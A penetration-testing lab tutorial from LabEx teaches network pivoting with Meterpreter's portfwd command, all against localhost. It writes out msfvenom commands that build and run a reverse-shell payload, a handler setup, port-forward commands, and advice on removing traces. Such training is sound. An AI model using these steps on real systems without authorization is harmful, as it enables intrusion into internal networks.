LabEx
Log InJoin Free

Perform Network Pivoting with portfwd in Meterpreter

Kali LinuxBeginner
Practice Now

Introduction

In this lab, you will learn about network pivoting, a fundamental technique in penetration testing. Pivoting is the process of using a compromised system to access other systems on an internal network that are not directly accessible from your machine.

We will use Metasploit's Meterpreter, a powerful post-exploitation payload, and its portfwd command to achieve this. You will learn how to set up a port forward to tunnel traffic through a compromised host, allowing you to interact with services on its local network as if you were directly connected.

Identify a service on a target's internal network

In this step, we will simulate gaining a Meterpreter session on a target machine. In a real scenario, this would be achieved by exploiting a vulnerability. For this lab, we will set up a listener in Metasploit and manually execute a payload to connect to it. This allows us to focus on the post-exploitation phase.

First, we need to install the Metasploit Framework.

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall

Next, open a terminal and start the Metasploit console.

msfconsole -q

Inside msfconsole, we'll set up a handler to listen for incoming connections.

use multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
exploit -j

Now, open a new terminal (you can use the "+" button in the terminal tab). In this new terminal, we'll generate and run a payload to connect back to our listener.

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o shell.elf
chmod +x shell.elf
./shell.elf

Switch back to your first terminal with msfconsole. You should see a message indicating a new session has been opened. Let's interact with it.

sessions -l
sessions -i 1

You are now in a Meterpreter session. A common first step is to perform reconnaissance. Let's check the network interfaces of the "compromised" host.

ifconfig

You will see several network interfaces. For this lab, we will assume that through further scanning (which is beyond the scope of this lab), we have discovered a web service running on 127.0.0.1 at port 8080. Our goal is to access this service.

Use the portfwd add command in Meterpreter

In this step, we will explore the portfwd command, which is a key tool for port forwarding in Meterpreter.

The portfwd command allows us to create a tunnel, redirecting traffic from a port on our local (attacker) machine to a specific IP and port accessible from the compromised host. This is the essence of pivoting.

The command has several options, but we will focus on add, list, and delete (or rm).

The syntax for adding a new port forward rule is as follows:

portfwd add -l <local_port> -p <remote_port> -r <remote_host>

Let's break down the parameters for the add operation:

  • -l <local_port>: The port on your local machine (the attacker machine) that will listen for incoming connections. You will connect to this port to access the remote service.
  • -p <remote_port>: The destination port on the target network that you want to access. In our case, this is 8080.
  • -r <remote_host>: The destination IP address on the target network. This host must be reachable by the compromised machine. In our case, this is 127.0.0.1.

In the next step, we will use this command to create a forward rule for the web service we identified.

Forward a port from the compromised host to your Kali machine

Now that you understand the portfwd add command, let's use it to forward the internal web service to our local machine.

Our goal is to access the service running on 127.0.0.1:8080 (from the perspective of the compromised host) by connecting to a port on our own machine. Let's choose local port 8888 for this purpose.

In your Meterpreter session, execute the following command:

portfwd add -l 8888 -p 8080 -r 127.0.0.1

This command tells Meterpreter to listen on your local port 8888 and forward any connections to 127.0.0.1:8080 on the target system. You should see a confirmation message.

[*] Local TCP relay created: 127.0.0.1:8888 -> 127.0.0.1:8080

The forward is now active. Any traffic sent to localhost:8888 on your machine will be tunneled through the Meterpreter session to the target's port 8080.

Access the internal service through the new local port

With the port forward in place, we can now access the internal web service as if it were running on our own machine.

Open a new terminal on your machine (do not close the msfconsole terminal).

Use a command-line tool like curl to make a request to the local port you set up (8888). This request will be sent to your local machine.

curl http://127.0.0.1:8888

The request will travel from your curl client to your local port 8888, through the Meterpreter session to the compromised host, and finally to the web service on 127.0.0.1:8080. You should see the HTML content of the internal web page as a result.

<html>
  <body>
    <h1>Internal Service Accessed!</h1>
  </body>
</html>

Success! You have successfully pivoted into the target's network and accessed a service that was not directly reachable.

List and remove the port forward rule

After you have finished using the pivot, it's good practice to clean up your port forwarding rules to remove traces and free up resources.

First, let's list all active port forwarding rules. Go back to your Meterpreter session and use the portfwd list command.

portfwd list

You will see a table listing the active forward, including its index number, type, and connection details.

Active Port Forwards
====================

Index  Type    Local Host  Local Port  Remote Host  Remote Port
-----  ----    ----------  ----------  -----------  -----------
1      forward 127.0.0.1   8888        127.0.0.1    8080

To remove a rule, you can use either portfwd delete or portfwd rm. You need to provide the index number of the rule from the list. In our case, the index is 1.

Execute the following command to remove the rule:

portfwd delete -i 1

You should see a confirmation that the TCP relay has been stopped.

[*] Stopping TCP relay on 127.0.0.1:8888...
[*] TCP relay stopped

You can run portfwd list again to confirm that the rule has been removed. The list should now be empty. This ensures that the tunnel is closed and your machine is no longer listening on port 8888.

Summary

In this lab, you learned the fundamentals of network pivoting using Meterpreter's portfwd utility.

You successfully simulated gaining a Meterpreter session, identified a hypothetical internal service, and created a port forward rule to tunnel traffic from your local machine to the target's internal network. You then accessed this internal service through the tunnel and learned how to list and remove the forwarding rules to clean up your session.

This technique is a fundamental skill in penetration testing, allowing you to expand your access from a single compromised host to an entire internal network.

Related Kali Linux Courses
Kali Linux for Beginners

Kali Linux for Beginners

cybersecuritykalilinux
Kali Server Exploitation in Action

Kali Server Exploitation in Action

cybersecuritykalilinux